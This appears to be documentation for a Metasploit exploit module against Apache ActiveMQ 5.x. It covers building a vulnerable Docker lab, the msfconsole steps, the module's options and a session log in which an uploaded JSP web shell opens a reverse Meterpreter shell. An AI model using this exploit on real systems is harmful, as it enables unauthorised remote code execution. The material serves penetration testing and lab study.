Grant Willcox
3.4 KiB
Vulnerable Application
This module exploits a vulnerability in Apache ActiveMQ 5.x before 5.14.0 which
allows remote attackers to upload and execute arbitrary files via an HTTP PUT
followed by an HTTP MOVE request. By default, a JSP web shell and Java
Meterpreter payload are uploaded to the /fileserver/ path of a vulnerable
server, then moved via an HTTP MOVE request to either /api/ or /admin/.
You should get a shell as the user running ActiveMQ.
Configuring a Vulnerable Environment
To use a pre-built Docker image:
docker run -it -p 8161:8161 rmohr/activemq:5.10.0
To run an older version of ActiveMQ with Java 8, create a new Dockerfile:
FROM openjdk:8
ENV ACTIVEMQ_VERSION 5.9.0
ENV ACTIVEMQ apache-activemq-$ACTIVEMQ_VERSION
ENV ACTIVEMQ_HOME /opt/activemq
RUN \
curl -O http://archive.apache.org/dist/activemq/apache-activemq/$ACTIVEMQ_VERSION/$ACTIVEMQ-bin.tar.gz && \
mkdir -p /opt && \
tar xf $ACTIVEMQ-bin.tar.gz -C /opt/ && \
rm $ACTIVEMQ-bin.tar.gz && \
ln -s /opt/$ACTIVEMQ $ACTIVEMQ_HOME && \
useradd -r -M -d $ACTIVEMQ_HOME activemq && \
chown activemq:activemq /opt/$ACTIVEMQ -R
USER activemq
WORKDIR $ACTIVEMQ_HOME
EXPOSE 61616 8161
CMD ["/bin/bash", "-c", "bin/activemq console"]
Next build and run the application:
docker build -t activemq:5.9.0 .
docker run -it -p 8161:8161 activemq:5.9.0
Verify the application is running by visiting
http://localhost:8161/admin/test/ with the credentials admin:admin
Verification Steps
- Run the application locally.
- Start msfconsole.
- Do:
use multi/http/apache_activemq_upload_jsp. - Do:
set rhosts <ip address of remote host>. - Do:
set lhost <ip address of local machine. - Do:
run. - You should get a shell under the process running ActiveMQ.
Options
AutoCleanup
Remove web shells from the target system after callback is received (Default: true)
BasicAuthUser
User-supplied username (Default: admin)
BasicAuthPass
User-supplied password associated with username (Default: admin)
JSP
Desired name to assign to the JSP web shell when it is uploaded to the target
system. Do not include the .jsp extension (Default: randomly-generated string)
Advanced Options
UploadPath
Custom path into which web shells will be uploaded on the target system. If the
user determines that a nonstandard directory is able to execute .jsp files, the
user can specify this directory for exploitation (Default: attempt /api/; if that
fails, attempt /admin/)
Scenarios
Targeting ActiveMQ 5.9.0
$ msfconsole -q
msf6 > use multi/http/apache_activemq_upload_jsp
[*] Using configured payload java/meterpreter/reverse_tcp
msf6 exploit(multi/http/apache_activemq_upload_jsp) > set LHOST 172.17.0.1
LHOST => 172.17.0.1
msf6 exploit(multi/http/apache_activemq_upload_jsp) > set RHOST 127.0.0.1
RHOST => 127.0.0.1
msf6 exploit(multi/http/apache_activemq_upload_jsp) > run
[*] Started reverse TCP handler on 172.17.0.1:4444
[*] Uploading http://127.0.0.1:8161/opt/activemq/webapps/api/qQSWrsmnXtZ.jar
[*] Uploading http://127.0.0.1:8161/opt/activemq/webapps/api/qQSWrsmnXtZ.jsp
[*] Sending stage (58110 bytes) to 172.17.0.2
[*] Meterpreter session 1 opened (172.17.0.1:4444 -> 172.17.0.2:45634) at 2021-03-14 18:25:38 -0400
[+] Deleted /opt/activemq/webapps/api/qQSWrsmnXtZ.jar
[+] Deleted /opt/activemq/webapps/api/qQSWrsmnXtZ.jsp
meterpreter >